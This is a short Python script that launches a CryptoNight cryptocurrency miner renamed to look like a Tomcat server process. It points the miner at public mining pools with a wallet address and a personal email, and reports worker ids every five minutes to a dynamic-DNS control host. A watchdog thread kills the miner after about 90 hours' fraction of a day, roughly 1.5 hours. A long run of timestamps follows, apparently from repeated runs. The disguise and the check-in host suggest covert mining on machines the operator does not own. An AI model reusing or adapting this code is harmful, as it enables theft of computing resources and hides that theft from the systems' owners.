import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:16:06.149482
#2018-02-17 17:05:06.972180
#2018-02-17 18:53:04.110057
#2018-02-17 20:41:07.885895
#2018-02-17 22:28:03.465033
#2018-02-18 00:11:06.263035
#2018-02-18 02:03:04.865012
#2018-02-18 03:51:04.667688
#2018-02-18 05:37:04.883377
#2018-02-18 07:30:01.554869
#2018-02-18 09:17:05.858701
#2018-02-18 11:03:05.908069
#2018-02-18 12:49:06.987328
#2018-02-18 14:37:01.432420
#2018-02-18 16:27:01.427118
#2018-02-18 18:16:05.490564
#2018-02-18 20:02:06.753784
#2018-02-18 21:49:04.983600
#2018-02-18 23:38:02.193211
#2018-02-19 01:24:06.842823
#2018-02-19 03:12:05.766315
#2018-02-19 04:57:01.634938
#2018-02-19 06:42:06.045487
#2018-02-19 08:32:06.589854
#2018-02-19 10:21:07.511098
#2018-02-19 12:09:07.093220
#2018-02-19 13:55:06.331671
#2018-02-19 15:44:02.111088
#2018-02-19 17:32:06.376782
#2018-02-19 19:18:07.706171
#2018-02-19 21:07:03.901725
#2018-02-19 22:53:06.103311
#2018-02-20 00:38:04.072673
#2018-02-20 02:27:04.132186
#2018-02-20 04:17:04.884570
#2018-02-20 06:01:05.293360
#2018-02-20 07:46:04.874298
#2018-02-20 09:29:05.345564
#2018-02-20 11:13:07.885817
#2018-02-20 13:01:06.762699
#2018-02-20 14:45:05.005988
#2018-02-20 16:31:01.627056
#2018-02-20 18:18:01.302380
#2018-02-20 20:08:08.921513
#2018-02-20 21:55:07.753807
#2018-02-21 00:56:04.119674
#2018-02-21 02:43:08.542227
#2018-02-21 04:32:06.322255
#2018-02-21 06:19:06.229370
#2018-02-21 08:05:07.129718
#2018-02-21 09:51:03.754699
#2018-02-21 11:39:01.788417
#2018-02-21 13:27:08.687089
#2018-02-21 15:12:04.423196
#2018-02-21 17:02:08.230292
#2018-02-21 19:11:01.803590
#2018-02-21 20:58:04.798015
#2018-02-21 22:44:02.227810
#2018-02-22 00:34:08.758889
#2018-02-22 02:20:07.996565
#2018-02-22 04:08:05.645213
#2018-02-22 05:53:04.048490
#2018-02-22 07:39:02.021225
#2018-02-22 09:27:03.833771
#2018-02-22 11:13:01.824266
#2018-02-22 12:58:09.235174
#2018-02-22 14:45:13.008040
#2018-02-22 16:32:04.413545
#2018-02-22 18:19:10.554661
#2018-02-22 20:12:09.156928
#2018-02-22 21:59:08.317097
#2018-02-22 23:47:07.823338
#2018-02-23 01:34:07.110046
#2018-02-23 03:20:04.209066
#2018-02-23 05:08:06.550734
#2018-02-23 06:52:07.601223
#2018-02-23 08:41:04.398087
#2018-02-23 10:57:04.414469
#2018-02-23 12:53:07.679607
#2018-02-23 14:39:03.810550
#2018-02-23 16:29:06.261396
#2018-02-23 18:15:10.963208
#2018-02-23 20:01:07.788886
#2018-02-23 21:44:09.137952
#2018-02-23 23:38:01.939909
#2018-02-24 01:27:04.579153
#2018-02-24 03:18:01.527687
#2018-02-24 05:03:04.992007
#2018-02-24 06:51:01.711645
#2018-02-24 08:41:01.317808
#2018-02-24 10:25:08.469739
#2018-02-24 12:20:01.295857
#2018-02-24 14:13:03.905870
#2018-02-24 15:59:08.214315
#2018-02-24 17:53:04.279917
#2018-02-24 19:40:08.511070
#2018-02-24 21:27:05.783416
#2018-02-25 00:11:03.663323
#2018-02-25 04:04:05.747022
#2018-02-25 06:43:03.460411
#2018-02-25 11:38:06.151116
#2018-02-25 13:56:02.101187
#2018-02-25 15:31:01.579277